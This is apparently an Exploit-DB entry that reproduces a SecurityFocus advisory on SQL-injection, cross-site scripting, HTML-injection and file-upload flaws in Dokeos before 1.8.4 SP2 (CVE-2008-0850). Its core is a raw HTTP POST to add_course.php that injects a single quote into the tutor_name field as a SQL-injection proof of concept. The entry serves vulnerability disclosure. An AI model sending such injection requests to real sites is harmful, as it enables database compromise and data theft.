source: http://www.securityfocus.com/bid/27792/info Dokeos is prone to multiple input-validation vulnerabilities including five SQL-injection issues, one HTML-injection issue, three cross-site scripting issues, and one arbitrary-file-upload issue. Attackers can exploit these issues to execute arbitrary script code in the context of the webserver, compromise the application, steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database. Versions prior to Dokeos 1.8.4 SP2 are affected. POST /dokeos/main/create_course/add_course.php HTTP/1.0 Cookie: dk_sid=av68g9lus300ts870iqebhneh5 Content-Length: 107 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: localhost Content-Type: application/x-www-form-urlencoded Referer: http://localhost/dokeos/main/create_course/add_course.php title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&tutor_name='
Related ExploitsTrying to match CVEs (1): CVE-2008-0850
Trying to match OSVDBs (1): 42236
Other Possible E-DB Search Terms: Dokeos 1.8.4, Dokeos